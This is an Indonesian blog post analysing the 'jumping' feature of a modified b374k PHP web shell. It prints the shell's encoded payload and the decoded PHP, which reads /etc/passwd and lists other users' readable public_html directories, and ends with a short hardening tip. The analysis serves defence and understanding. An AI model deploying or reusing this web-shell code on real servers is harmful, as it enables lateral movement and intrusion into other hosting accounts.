Latest Post :
Home » » Teknik Jumping Pada Php Shell b374k Syndrom2211

Teknik Jumping Pada Php Shell b374k Syndrom2211

Sabtu, 04 Agustus 2012 | 0 komentar

Penulis: Aray Van Jakster

--[ Pendahuluan


Beberapa waktu lalu, saya mendapatkan sample php shell b374k modifikasi yang

diberi nama "syndrom2211 edition". Shell ini memiliki fitur baru yaitu teknik
jumping yang pada prinsipnya cukup sederhana.


--[ Langkah-langkah


* Decode php shell b374k syndrom2211 dengan mengganti bagian "eval(gzinflate(

  base64_decode" menjadi "echo gzinflate(base64_decode" dan jangan lupa hilang
  kan satu tanda tutup kurung ")" pada bagian akhir scriptnya.

* Setelah proses decoding, kita dapat melihat variabel "jumper" yang di-encode

  menggunakan base64


         $jumper="3VRRb5swEP4rFwvNRqVAtkmTEiCTpk7aHjppe5rSiBlsilfAyDZrs2r/fefQpM3Lf
         sCEMObuu++7Ox/IutVAMserTkLdcWvzG1L3otIPN6TInMFbQK07O/IBXa/RStbAAttDDmpQ5a1
         0jFreyLLXQtIQ8hzSEDYwQ6huGroCoSQjV8Zos4JvRzC6vwxZ4kSBi/GLT6PIhPp1ykUNjUbNb
         VlWb969vYN+OSwh89mcILd8z32yHFojm5xuaEHi4OGa9zImWcKR2OMLuBLKKX1dlrssQY0CzpR
         +zjTwGZ8db+HTIPQgreJ3E7yq9bhfA4kFd5LR7zRyqpcsDGMCz1qwvgxhpibhGqx0pYeVneqVY
         yma3gcjit0LrLzRoxwYTaSrk9lII2ooglQDbPEEDOHR9w4Y2V7u4NBAWMEHPYnhh4Ovkgt4wfD
         /9vIPBONUYdu4MXzP0BJMVhp7Zqn10JwZFL6la7hvVSfZopG6Yce+ho84oM74g8AJtif73H6ML
         GCZph41aq+CWNwwHxPRFT0mMGCy3jtV6Ji9aeRDPEAo89t/Akmre5nQ+BQR0wSr6VRdtq7vEjq
         LsmfGBUZRn6O3K1saPGh/nuzA6R2HIstxsu0cZqNTNEq/9KJSNIf5NvorUBcXft9o5K1beGIAb
         ueikF76/wLdftTTIGCxg+NAkM0+PyvnvBRS/MOZHOanMgX14pviLw==";

* Jika variabel tersebut di-decode dan di-gzinflate, maka hasilnya adalah
  sebagai berikut:

         3      set_time_limit(0);
         4      @$passwd = fopen('/etc/passwd', 'r');
         5      if(!$passwd){
         6        die("[...]");
         7      }
         8      $pub = array();
         9      $users = array();
        10      $conf = array();
        11      $i = 0;
        12      while(!feof($passwd)){
        13        $str = fgets($passwd);
        14        if($i > 100) {
        15              $pos = strpos($str, ':');
        16              $username = substr($str, 0, $pos);
        17              $dirz = '/home/'.$username.'/public_html/';
        18              if(($username != '')) {
        19                if(is_readable($dirz)) {
        20                      array_push($users, $username);
        21                      array_push($pub, $dirz);
        22                }
        23              }
        24        }
        25        $i++;
        26      }
        27      foreach($users as $user){
        28        echo '[Found !] <a href="?y=/home/'.$user.'/public_html">/home/' \
                  .$user.'/public_html/</a><br>';

* Dari potongan kode di atas, bisa terlihat, jika teknik jumper yang dimaksud
  adalah dengan membaca nama user dari file "/etc/passwd" lalu setelah
  mendapatkan daftar user, maka kemudian akan memeriksa apakah direktori
  "/home/user/public_html" dapat dibaca. Jika dapat dibaca, maka hal tersebut
  akan ditampilkan pada output.

* Untuk menanggulangi hal tersebut, kita bisa membatasi akses script php

  sehingga tidak dapat membaca file "/etc/passwd". Ini misalnya bisa diperoleh
  dengan mengatur basepath php.


--[ Penutup


Sekian tutorial singkat kali ini, semoga bermanfaat. Terima kasih kepada Tuhan

Yang Maha Esa, om Sakitjiwa, om Siddiq, RNDC, Maxindo, dan Anda :-)
Share this article :

Tidak ada komentar:

Posting Komentar

 
Support : Creating Website | Johny Template | Mas Template
Copyright © 2011. [./Mr.Z Blog] - All Rights Reserved
Template Modify by Creating Website
Proudly powered by Blogger